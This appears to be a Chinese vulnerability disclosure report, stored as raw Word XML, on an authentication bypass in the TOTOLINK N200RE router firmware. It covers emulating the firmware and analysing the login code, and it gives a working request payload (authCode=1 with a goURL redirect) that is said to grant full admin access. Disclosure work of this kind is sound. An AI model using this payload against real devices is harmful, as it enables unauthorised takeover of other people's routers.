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48DB1" w14:textId="60BFDB22" w:rsidR="00F97CF5" w:rsidRDefault="00557303" w:rsidP="00D65EDB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00557303">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>TOTOLINK路由器N200RE存在login authcode绕过验证登录漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2AA8CC" w14:textId="7D7EAB64" w:rsidR="00CD54AE" w:rsidRDefault="007A6913" w:rsidP="007A6913">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>资产证明</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4830AE00" w14:textId="6D44404F" w:rsidR="00CD54AE" w:rsidRDefault="007A6913">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:t>截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06E459" w14:textId="247C334C" w:rsidR="009249C2" w:rsidRDefault="009249C2"/>
    <w:p w14:paraId="6E34F197" w14:textId="0317B2A2" w:rsidR="003704D2" w:rsidRDefault="00922A0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2C951E" wp14:editId="0BDEF9BD">
            <wp:extent cx="5318171" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="947153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53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0786" cy="36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B89A" w14:textId="462E1381" w:rsidR="003704D2" w:rsidRDefault="003704D2"/>
    <w:p w14:paraId="3200A286" w14:textId="1C3E1288" w:rsidR="003704D2" w:rsidRDefault="00593B99" w:rsidP="00593B99">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固件获取</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0CFCF6" w14:textId="77777777" w:rsidR="00C85EDA" w:rsidRPr="00C85EDA" w:rsidRDefault="00C85EDA" w:rsidP="00C85EDA"/>
    <w:p w14:paraId="0FA6A4B7" w14:textId="3D300989" w:rsidR="003704D2" w:rsidRDefault="00E903F0">
      <w:r w:rsidRPr="00E903F0">
        <w:t>https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/204/ids/36.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6731D9" w14:textId="77777777" w:rsidR="0018404C" w:rsidRDefault="0018404C"/>
    <w:p w14:paraId="1D854513" w14:textId="61B994B1" w:rsidR="0018404C" w:rsidRDefault="00E903F0">
      <w:r>
        <w:t>V9.3.5u.6095_B20200916</w:t>
      </w:r>
      <w:r w:rsidR="00954CCD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本的固件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08747939" w14:textId="77777777" w:rsidR="00954CCD" w:rsidRPr="0018404C" w:rsidRDefault="00954CCD"/>
    <w:p w14:paraId="1DA51483" w14:textId="0C93954D" w:rsidR="003704D2" w:rsidRDefault="00C55FF6" w:rsidP="009545C3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞证明</w:t>
      </w:r>
      <w:r w:rsidR="00AA3614">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCAE29A" w14:textId="292F62AD" w:rsidR="0027649E" w:rsidRDefault="0027649E"/>
    <w:p w14:paraId="6FC31E4B" w14:textId="77777777" w:rsidR="0027649E" w:rsidRDefault="0027649E"/>
    <w:p w14:paraId="4D2CAEEE" w14:textId="77777777" w:rsidR="009249C2" w:rsidRDefault="009249C2"/>
    <w:p w14:paraId="1332A125" w14:textId="492B657D" w:rsidR="00D46645" w:rsidRDefault="00FA24D8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截图如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798670A2" w14:textId="37B62D8A" w:rsidR="00083C06" w:rsidRDefault="00083C06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hint="eastAsia"/>
        </w:rPr>
        <w:t>使用WSL以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00083C06">
        <w:t>QEMU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MIPSel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将环境配置好，导入固件系统进行仿真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，并使用</w:t>
      </w:r>
      <w:r w:rsidR="00D85098" w:rsidRPr="00D85098">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>chroot ./squashfs-root/ sh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进入固件系统，开启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www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下的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web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服务：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807D7A3" w14:textId="6054CA77" w:rsidR="00E55405" w:rsidRDefault="00D44E98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44E98">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lighttpd -f lighttp/lighttpd.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9045F4" w14:textId="7CD0B5C3" w:rsidR="00D85098" w:rsidRDefault="00E5540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DD9E8E2" wp14:editId="2AD9DD22">
            <wp:extent cx="5274310" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1919768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68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FFC5" w14:textId="7D30FAE9" w:rsidR="00083C06" w:rsidRDefault="00083C06"/>
    <w:p w14:paraId="74F5E9FB" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="38FCAC37" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="323F7E36" w14:textId="5692A2D4" w:rsidR="006938D5" w:rsidRDefault="006938D5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启的web服务证明如下</w:t>
      </w:r>
      <w:r w:rsidR="00D4650B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到下方是</w:t>
      </w:r>
      <w:r w:rsidR="00D4650B">
        <w:t>V9.3.5u.6095</w:t>
      </w:r>
      <w:r w:rsidR="002C0ABF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895211A" w14:textId="77777777" w:rsidR="006938D5" w:rsidRDefault="006938D5"/>
    <w:p w14:paraId="31E40F3A" w14:textId="23141938" w:rsidR="006938D5" w:rsidRDefault="00D4650B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="551838E2" wp14:editId="38792483">
            <wp:extent cx="3671304" cy="2262188"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="172748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8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266" cy="22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F26B" w14:textId="77777777" w:rsidR="00737C37" w:rsidRDefault="00737C37"/>
    <w:p w14:paraId="4C636ED1" w14:textId="77777777" w:rsidR="00737C37" w:rsidRDefault="00737C37"/>
    <w:p w14:paraId="62E42A24" w14:textId="77777777" w:rsidR="008809CB" w:rsidRDefault="008809CB" w:rsidP="008809CB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rStyle w:val="md-plain"/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login authcode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绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7E37E" w14:textId="2BAB7DE9" w:rsidR="004631E5" w:rsidRPr="004631E5" w:rsidRDefault="004631E5" w:rsidP="004631E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一开始页面为/login.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6BA9C1" w14:textId="29C51D18" w:rsidR="00122E56" w:rsidRPr="00122E56" w:rsidRDefault="006D6D81" w:rsidP="00122E56">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ida分析</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lighttpd</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>服务器</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上我们搜索</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>authcode</w:t>
      </w:r>
      <w:r w:rsidR="000B545C">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，直接就找到了独立的字符串，跟踪去看看</w:t>
      </w:r>
      <w:r w:rsidR="00AD1870"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="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>只要</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>authcode</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>就能生成</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是如果直接改了这个参数发现还是会回到</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>login.html,</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>原因在于</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>goURL</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>该参数是一个重定向页面参数，所以还要修改该参数到</w:t>
      </w:r>
      <w:r w:rsidR="00320F2A" w:rsidRPr="00320F2A">
        <w:rPr>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>home.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E1289" w14:textId="77777777" w:rsidR="00E87103" w:rsidRDefault="00E87103"/>
    <w:p w14:paraId="7CAA1E6B" w14:textId="0C4CF32C" w:rsidR="00FA24D8" w:rsidRDefault="004631E5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1398D018" w14:textId="431701A9" w:rsidR="004631E5" w:rsidRDefault="009709AC">
      <w:r w:rsidRPr="009709AC">
        <w:lastRenderedPageBreak/>
        <w:t>/formLoginAuth.htm?authCode=1&amp;userName=&amp;goURL=home.html&amp;action=login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBBF55E" w14:textId="77777777" w:rsidR="009A5466" w:rsidRDefault="009A5466"/>
    <w:p w14:paraId="6671DF0D" w14:textId="0EC351F8" w:rsidR="009A5466" w:rsidRDefault="009709AC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="005F7778">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://127.0.0.1/advance/changepwd.html?time=1715093812978</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="633F4331" w14:textId="0E655178" w:rsidR="009709AC" w:rsidRDefault="009709AC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>便可直接进入后台</w:t>
      </w:r>
      <w:r w:rsidR="001E76BC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行任意操作</w:t>
      </w:r>
      <w:r w:rsidR="0028424F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030A0BD3" w14:textId="77777777" w:rsidR="009709AC" w:rsidRPr="009709AC" w:rsidRDefault="009709AC"/>
    <w:p w14:paraId="67E2968A" w14:textId="3ACF5BD2" w:rsidR="00005236" w:rsidRDefault="001E76BC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40026506" wp14:editId="1D555CA7">
            <wp:extent cx="5274310" cy="2369820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1923655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55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500" w14:textId="77777777" w:rsidR="0087425D" w:rsidRDefault="0087425D"/>
    <w:p w14:paraId="0EC66911" w14:textId="008A0BB0" w:rsidR="0087425D" w:rsidRPr="0087425D" w:rsidRDefault="0087425D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这时候就可以成功绕过鉴权了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="md-plain"/>
          <w:rFonts w:ascii="Open Sans" w:hAnsi="Open Sans" w:cs="Open Sans" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0087425D" w:rsidRPr="008742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908B2" w14:textId="77777777" w:rsidR="0089357A" w:rsidRDefault="0089357A" w:rsidP="00E903F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="768C7293" w14:textId="77777777" w:rsidR="0089357A" w:rsidRDefault="0089357A" w:rsidP="00E90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C2FB5B" w14:textId="77777777" w:rsidR="0089357A" w:rsidRDefault="0089357A" w:rsidP="00E903F0">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="04D0516A" w14:textId="77777777" w:rsidR="0089357A" w:rsidRDefault="0089357A" w:rsidP="00E903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29"/>
    <w:rsid w:val="00005236"/>
    <w:rsid w:val="000669DF"/>
    <w:rsid w:val="0007422A"/>
    <w:rsid w:val="000806A3"/>
    <w:rsid w:val="00082203"/>
    <w:rsid w:val="00083C06"/>
    <w:rsid w:val="000B545C"/>
    <w:rsid w:val="000C463E"/>
    <w:rsid w:val="000E05C7"/>
    <w:rsid w:val="000E13BD"/>
    <w:rsid w:val="0012091B"/>
    <w:rsid w:val="00122E56"/>
    <w:rsid w:val="00156E23"/>
    <w:rsid w:val="00161B35"/>
    <w:rsid w:val="0018404C"/>
    <w:rsid w:val="001B638C"/>
    <w:rsid w:val="001E76BC"/>
    <w:rsid w:val="00205C1B"/>
    <w:rsid w:val="00217A78"/>
    <w:rsid w:val="002334BA"/>
    <w:rsid w:val="002635ED"/>
    <w:rsid w:val="0027649E"/>
    <w:rsid w:val="0028424F"/>
    <w:rsid w:val="002C0ABF"/>
    <w:rsid w:val="002C6C31"/>
    <w:rsid w:val="00306AB7"/>
    <w:rsid w:val="00320F2A"/>
    <w:rsid w:val="00351A1A"/>
    <w:rsid w:val="003556F6"/>
    <w:rsid w:val="003704D2"/>
    <w:rsid w:val="003D3FB4"/>
    <w:rsid w:val="003D64A7"/>
    <w:rsid w:val="00421B3F"/>
    <w:rsid w:val="004631E5"/>
    <w:rsid w:val="00466345"/>
    <w:rsid w:val="004E419A"/>
    <w:rsid w:val="00540FAA"/>
    <w:rsid w:val="00557303"/>
    <w:rsid w:val="00577B59"/>
    <w:rsid w:val="00593B99"/>
    <w:rsid w:val="005A0363"/>
    <w:rsid w:val="00644001"/>
    <w:rsid w:val="00655095"/>
    <w:rsid w:val="00661099"/>
    <w:rsid w:val="006938D5"/>
    <w:rsid w:val="006C572A"/>
    <w:rsid w:val="006D6D81"/>
    <w:rsid w:val="006F029F"/>
    <w:rsid w:val="00737C37"/>
    <w:rsid w:val="00755A0E"/>
    <w:rsid w:val="00791993"/>
    <w:rsid w:val="007A6913"/>
    <w:rsid w:val="007F05CC"/>
    <w:rsid w:val="00816743"/>
    <w:rsid w:val="0085515B"/>
    <w:rsid w:val="008613D2"/>
    <w:rsid w:val="0087425D"/>
    <w:rsid w:val="008809CB"/>
    <w:rsid w:val="00882C64"/>
    <w:rsid w:val="0089357A"/>
    <w:rsid w:val="008B5204"/>
    <w:rsid w:val="008E45AC"/>
    <w:rsid w:val="00922A0E"/>
    <w:rsid w:val="009249C2"/>
    <w:rsid w:val="009545C3"/>
    <w:rsid w:val="00954CCD"/>
    <w:rsid w:val="00956315"/>
    <w:rsid w:val="009709AC"/>
    <w:rsid w:val="009A5466"/>
    <w:rsid w:val="009D2DC3"/>
    <w:rsid w:val="009E2B96"/>
    <w:rsid w:val="00A27277"/>
    <w:rsid w:val="00A43CCD"/>
    <w:rsid w:val="00A53B94"/>
    <w:rsid w:val="00A81E15"/>
    <w:rsid w:val="00A96675"/>
    <w:rsid w:val="00AA3614"/>
    <w:rsid w:val="00AD1870"/>
    <w:rsid w:val="00B549FC"/>
    <w:rsid w:val="00BB68D5"/>
    <w:rsid w:val="00BC6BE9"/>
    <w:rsid w:val="00C30428"/>
    <w:rsid w:val="00C33284"/>
    <w:rsid w:val="00C55FF6"/>
    <w:rsid w:val="00C633AF"/>
    <w:rsid w:val="00C64ECB"/>
    <w:rsid w:val="00C85EDA"/>
    <w:rsid w:val="00CD54AE"/>
    <w:rsid w:val="00CE0D02"/>
    <w:rsid w:val="00D15334"/>
    <w:rsid w:val="00D44E98"/>
    <w:rsid w:val="00D45632"/>
    <w:rsid w:val="00D4650B"/>
    <w:rsid w:val="00D46645"/>
    <w:rsid w:val="00D576E0"/>
    <w:rsid w:val="00D63610"/>
    <w:rsid w:val="00D65EDB"/>
    <w:rsid w:val="00D85098"/>
    <w:rsid w:val="00DB5305"/>
    <w:rsid w:val="00DC79A1"/>
    <w:rsid w:val="00DF0CA3"/>
    <w:rsid w:val="00E55405"/>
    <w:rsid w:val="00E87103"/>
    <w:rsid w:val="00E903F0"/>
    <w:rsid w:val="00EF1B07"/>
    <w:rsid w:val="00F86530"/>
    <w:rsid w:val="00F97CF5"/>
    <w:rsid w:val="00FA24D8"/>
    <w:rsid w:val="00FB0F57"/>
    <w:rsid w:val="00FF1A29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4203BB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3760C937-6E4A-4F4B-B37C-D158BFB0C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9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69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09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1099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85515B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7A691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A69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E903F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903F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903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903F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8809CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="md-plain">
    <w:name w:val="md-plain"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="008809CB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="md-end-block">
    <w:name w:val="md-end-block"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="008742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4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://127.0.0.1/advance/changepwd.html?time=1715093812978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衡 张</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>衡 张</cp:lastModifiedBy>
  <cp:revision>109</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-13T09:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-07T15:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>